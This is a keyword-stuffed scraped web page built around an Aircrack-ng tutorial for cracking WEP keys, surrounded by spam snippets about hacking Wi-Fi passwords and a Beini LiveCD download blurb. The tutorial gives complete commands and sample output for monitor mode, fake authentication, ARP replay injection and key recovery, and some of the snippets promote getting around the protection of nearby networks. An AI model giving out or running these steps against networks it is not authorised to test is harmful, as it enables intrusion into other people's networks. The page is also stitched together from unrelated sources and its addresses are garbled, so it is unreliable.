Wep Crack Device

Hey, Thanks for the quick response. I am using Backtrack 3. Also it s a PCI not USB. I ve just learned that the WG311 comes in v1, v2, and v3.

The access point uses WEP open authentication. It will not work if shared key authentication SKA is being used. With SKA, the only way to be successful.

This tutorial walks you though a very simple case to crack a WEP key. It is intended to build your basic skills and get you familiar with the concepts.

simple_wep_crack [Aircrack-ng]

Simple_wep_crack

Version: 1.20 January 11, 2010

By: darkAudax

Introduction

This tutorial walks you though a very simple case to crack a WEP key. It is intended to build your basic skills and get you familiar with the concepts. It assumes you have a working wireless card with drivers already patched for injection.

The basic concept behind this tutorial is using aireplay-ng replay an ARP packet to generate new unique IVs. In turn, aircrack-ng uses the new unique IVs to crack the WEP key. It is important to understand what an ARP packet is. This What is an ARP. section provides the details.

For a start to finish newbie guide, see the Linux Newbie Guide. Although this tutorial does not cover all the steps, it does attempt to provide much more detailed examples of the steps to actually crack a WEP key plus explain the reason and background of each step. For more information on installing aircrck-ng, see Installing Aircrack-ng and for installing drivers see Installing Drivers.

It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.

I would like to acknowledge and thank the Aircrack-ng team for producing such a great robust tool.

Please send me any constructive feedback, positive or negative. Additional troubleshooting ideas and tips are especially welcome.

Assumptions

First, this solution assumes:

There is at least one wired or wireless client connected to the network and they are active. The reason is that this tutorial depends on receiving at least one ARP request packet and if there are no active clients then there will never be any ARP request packets.

You are using v0.9 of aircrack-ng. If you use a different version then some of the common options may have to be changed.

Ensure all of the above assumptions are true, otherwise the advice that follows will not work. In the examples below, you will need to change ath0 to the interface name which is specific to your wireless card.

Equipment used

In this tutorial, here is what was used:

MAC address of PC running aircrack-ng suite: 00:0F:B:AC:82

BSSID MAC address of access point : :6C:7E:

ESSID Wireless network name : teddy

Access point channel: 9

Wireless interface: ath0

You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network.

Solution

Solution Overview

To crack the WEP key for an access point, we need to gather lots of initialization vectors IVs. Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point AP resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.

Once we have captured a large number of IVs, we can use them to determine the WEP key.

Here are the basic steps we will be going through:

Start the wireless interface in monitor mode on the specific AP channel

Test the injection capability of the wireless device to the AP

Use aireplay-ng to do a fake authentication with the access point

Start airodump-ng on AP channel with a bssid filter to collect the new unique IVs

Start aireplay-ng in ARP request replay mode to inject packets

Run aircrack-ng to crack key using the IVs collected

Step 1 - Start the wireless interface in monitor mode on AP channel

The purpose of this step is to put your card into what is called monitor mode. Monitor mode is mode whereby your card can listen to every packet in the air. Normally your card will only hear packets addressed to you. By hearing every packet, we can later select some for injection. As well, only there are some rare exceptions monitor mode allows you to inject packets. Note: this procedure is different for non-Atheros cards.

First stop ath0 by entering:

airmon-ng stop ath0

The system responds:

Interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP parent: wifi0 VAP destroyed

Enter iwconfig to ensure there are no other athX interfaces. It should look similar to this:

lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.

If there are any remaining athX interfaces, then stop each one. When you are finished, run iwconfig to ensure there are none left.

Now, enter the following command to start the wireless card on channel 9 in monitor mode:

airmon-ng start wifi0 9

Substitute the channel number that your AP runs on for 9 in the command above. This is important. You must have your wireless card locked to the AP channel for the following steps in this tutorial to work correctly.

Note: In this command we use wifi0 instead of our wireless interface of ath0. This is because the madwifi-ng drivers are being used. For other drivers, use the wireless interface name. Examples: wlan0 or rausb0.

The system will respond:

ath0 Atheros madwifi-ng VAP parent: wifi0 monitor mode enabled

You will notice that ath0 is reported above as being put into monitor mode.

To confirm the interface is properly setup, enter iwconfig.

ath0 IEEE 802.11g ESSID: Nickname:

Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B:AC:82

Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity 0/3

Retry:off RTS thr:off Fragment thr:off

Encryption key:off

Power Management:off

Link Quality 0/94 Signal level -95 dBm Noise level -95 dBm

Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0

Tx excessive retries:0 Invalid misc:0 Missed beacon:0

In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9 and the Access Point shows the MAC address of your wireless card. Please note that only the madwifi-ng drivers show the MAC address of your wireless card, the other drivers do not do this. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.

To match the frequency to the channel, check out:

wp134132. This will give you the frequency for each channel.

Step 2 - Test Wireless Device Packet Injection

The purpose of this step ensures that your card is within distance of your AP and can inject packets to it.

Enter:

aireplay-ng -9 -e teddy -a :6C:7E: ath0

Where:

-9 means injection test

-e teddy is the wireless network name

-a :6C:7E: is the access point MAC address

ath0 is the wireless interface name

The system should respond with:

:35 Waiting for beacon frame BSSID: :6C:7E: on channel 9

:35 Trying broadcast probe requests

:35 Injection is working.

:37 Found 1 AP

:37 Trying directed probe requests

:37 :6C:7E: - channel: 9 - teddy

:39 Ping min/avg/max : 1.827ms/68.145ms/111.610ms Power: 33.73

:39 30/30: 100

The last line is important. Ideally it should say 100 or a very high percentage. If it is low then you are too far away from the AP or too close. If it is zero then injection is not working and you need to patch your drivers or use different drivers.

See the injection test for more details.

Step 3 - Start airodump-ng to capture the IVs

The purpose of this step is to capture the IVs generated. This step starts airodump-ng to capture the IVs from the specific access point.

Open another console session to capture the generated IVs. Then enter:

airodump-ng -c 9 --bssid :6C:7E: -w output ath0

-c 9 is the channel for the wireless network

--bssid :6C:7E: is the access point MAC address. This eliminate extraneous traffic.

-w capture is file name prefix for the file which will contain the IVs.

ath0 is the interface name.

While the injection is taking place later, the screen will look similar to this:

CH 9 Elapsed: 8 mins 2007-03-21

BSSID PWR RXQ Beacons Data, /s CH MB ENC CIPHER AUTH ESSID

:6C:7E: 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

:6C:7E: 00:0F:B:AC:82 42 0 183782

Step 4 - Use aireplay-ng to do a fake authentication with the access point

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a DeAuthentication packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.

The lack of association with the access point is the single biggest reason why injection fails. Remember the golden rule: The MAC you use for injection must be associated with the AP by either using fake authentication or using a MAC from an already-associated client.

To associate with an access point, use fake authentication:

aireplay-ng -1 0 -e teddy -a :6C:7E: -h 00:0F:B:AC:82 ath0

-1 means fake authentication

0 reassociation timing in seconds

-h 00:0F:B:AC:82 is our card MAC address

Success looks like:

:20 Sending Authentication Request

:20 Authentication successful

:20 Sending Association Request

:20 Association successful :-

Or another variation for picky access points:

aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a :6C:7E: -h 00:0F:B:AC:82 ath0

6000 - Reauthenticate every 6000 seconds. The long period also causes keep alive packets to be sent.

-o 1 - Send only one set of packets at a time. Default is multiple and this confuses some APs.

-q 10 - Send keep alive packets every 10 seconds.

:32 Sending Authentication Request

:32 Authentication successful

:32 Sending Association Request

:32 Association successful :-

:42 Sending keep-alive packet

:52 Sending keep-alive packet

and so on.

Here is an example of what a failed authentication looks like:

:02 Sending Authentication Request

:02 Authentication successful

:02 Sending Association Request

:02 Association successful :-

:02 Got a deauthentication packet.

:05 Sending Authentication Request

:05 Authentication successful

:05 Sending Association Request

:10 Sending Authentication Request

:10 Authentication successful

:10 Sending Association Request

Notice the Got a deauthentication packet and the continuous retries above. Do not proceed to the next step until you have the fake authentication running correctly.

Troubleshooting Tips

Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and

Run: tcpdump -n -vvv -s0 -e -i grep -i -E RA: Authentication ssoc

You would then look for error messages.

If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and

Run: tcpdump -n -e -s0 -vvv -i ath0

Here is a typical tcpdump error message you are looking for:

:34.360700 314us BSSID::6c:7e: DA:00:0F:B:AC:82 SA::6c:7e: DeAuthentication: Class 3 frame received from nonassociated station

Notice that the access point :6c:7e: is telling the source 00:0F:B:AC:82 you are not associated. Meaning, the AP will not process or accept the injected packets.

If you want to select only the DeAuth packets with tcpdump then you can use: tcpdump -n -e -s0 -vvv -i ath0 grep -i DeAuth. You may need to tweak the phrase DeAuth to pick out the exact packets you want.

Step 5 - Start aireplay-ng in ARP request replay mode

The purpose of this step is to start aireplay-ng in a mode which listens for ARP requests then reinjects them back into the network. For an explanation of ARP, see this PC Magazine page or Wikipedia. The reason we select ARP request packets is because the AP will normally rebroadcast them and generate a new IV. Again, this is our objective, to obtain a large number of IVs in a short period of time.

Open another console session and enter:

aireplay-ng -3 -b :6C:7E: -h 00:0F:B:AC:82 ath0

It will start listening for ARP requests and when it hears one, aireplay-ng will immediately start to inject it. See the Generating ARPs section for tricks on generating ARPs if your screen says got 0 ARP requests after waiting a long time.

Here is what the screen looks like when ARP requests are being injected:

Saving ARP requests in replay_arp-0321-191525.cap

You should also start airodump-ng to capture replies.

Read 629399 packets got 316283 ARP requests, sent 210955 packets

You can confirm that you are injecting by checking your airodump-ng screen. The data packets should be increasing rapidly. The /s should be a decent number. However, decent depends on a large variety of factors. A typical range is 300 to 400 data packets per second. It can as low as a 100/second and as high as a 500/second.

If you receive a message similar to Got a deauth/disassoc packet. Is the source mac associated., this means you have lost association with the AP. All your injected packets will be ignored. You must return to the fake authentication step Step 3 and successfully associate with the AP.

Step 6 - Run aircrack-ng to obtain the WEP key

The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps.

Note: For learning purposes, you should use a 64 bit WEP key on your AP to speed up the cracking process. If this is the case, then you can include -n 64 to limit the checking of keys to 64 bits.

Two methods will be shown. It is recommended you try both for learning purposes. By trying both methods, you will see quickly the PTW method successfully determines the WEP key compared to the FMS/Korek method. As a reminder, the PTW method only works successfully with arp request/reply packets. Since this tutorial covers injection of ARP request packets, you can properly use this method. The other requirement is that you capture the full packet with airodump-ng. Meaning, do not use the --ivs option.

Start another console session and enter:

aircrack-ng -b :6C:7E: output. cap

-b :6C:7E: selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP.

output. cap selects all files starting with output and ending in . cap.

To also use the FMS/Korek method, start another console session and enter:

aircrack-ng -K -b :6C:7E: output. cap

-K invokes the FMS/Korek method

If you are using 1.0-rc1, add the option -K for the FMS/KoreK attack. 1.0-rc1 defaults to PTW.

You can run this while generating packets. In a short time, the WEP key will be calculated and presented. You will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128 bit keys. If you are using the PTW attack, then you will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128 bit. These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key.

Here is what success looks like:

Aircrack-ng 0.9

:06 Tested 674449 keys got 96610 IVs

KB depth byte vote

0 0/ 9 12 15 F9 15 47 12 F7 12 FE 12 1B 5 77 5 A5 3 F6 3 03 0

1 0/ 8 34 61 E8 27 E0 24 06 18 3B 16 4E 15 E1 15 2D 13 89 12 E4 12

2 0/ 2 56 87 A6 63 15 17 02 15 6B 15 E0 15 AB 13 0E 10 17 10 27 10

3 1/ 5 78 43 1A 20 9B 20 4B 17 4A 16 2B 15 4D 15 58 15 6A 15 7C 15

KEY FOUND. ::90

Probability: 100

Notice that in this case it took far less then the estimated 250,000 IVs to crack the key. For this example, the FMS/KoreK attack was used.

General Troubleshooting

Generating ARPs

In order for this tutorial to work, you must receive at least one ARP packet. On your home network, here is an easy way to generate an ARP packet. On a wired or wireless PC, ping a non-existent IP on your home LAN. A wired PC means a PC connected to your LAN via an ethernet cable. Lets say your home LAN address space is 192.168.1.1 through 192.168.1.254. Pick an IP between 1 and 254 which is not assigned to a network device. For example, if the IP 192.168.1.213 is not being used then ping 192.168.1.213. This will cause an ARP to be broadcast via your wireless access point and in turn, this will kick off the reinjection of packets by aireplay-ng.

wep crack device

Wifi Password Hack 2013 Crack Wifi Passwords WEP, WPA and WPA2 Aircrack DownloadWifi Password Hack 2013 Crack Wifi Passwords WEP.

Last week we showed you how to crack a Wi-Fi network s WEP key using a live CD and some command line fu. Today we ve got other cracking options but more importantly.

wep crack device

Download free Beini 1.2.3 operating system ideal to audit the encryption of Wi-Fi or wireless networks to recover WEP or WPA passwords.

wep crack device

Jul 15, 2013  TUTO: Hack WEP/WPA/WPA2 withGalaxy s2 I-9100 Disconnect device on wifi.

Beini 1.2.3 LiveCD

wep crack device

Download Beini for free, a small LiveCD Linux distribution designed to be able to audit Wi-Fi networks. This utility includes an ideal pack of tools designed to work with the security of wireless networks.

Test the security of the encryption of Wi-Fi access points.

Thanks to Beini, recovering WEP and WPA passwords is easier than ever. Among its tools you ll find a wireless network scanner or detector and a package injection tool. Use a combination of both tools to avoid the protection systems of nearby Wi-Fi networks.

Features

Small distribution based on Linux and optimized to audit wireless networks.

Burn the ISO image on a CD or copy it to a USB device.

Compatible with a large amount of devices and Wi-Fi cards.

Check the security of a wireless network thanks to Beini, with which it will be much easier to audit the encryption of Wi-Fi networks. Download Beini for free.

Requirements and additional information:

Requires a ZIP compatible compressor.

Introduction. This article has been superceeded by How to Crack WEPReloaded. Hundreds, perhaps thousands of articles have been written about the vulnerability of.

wep crack device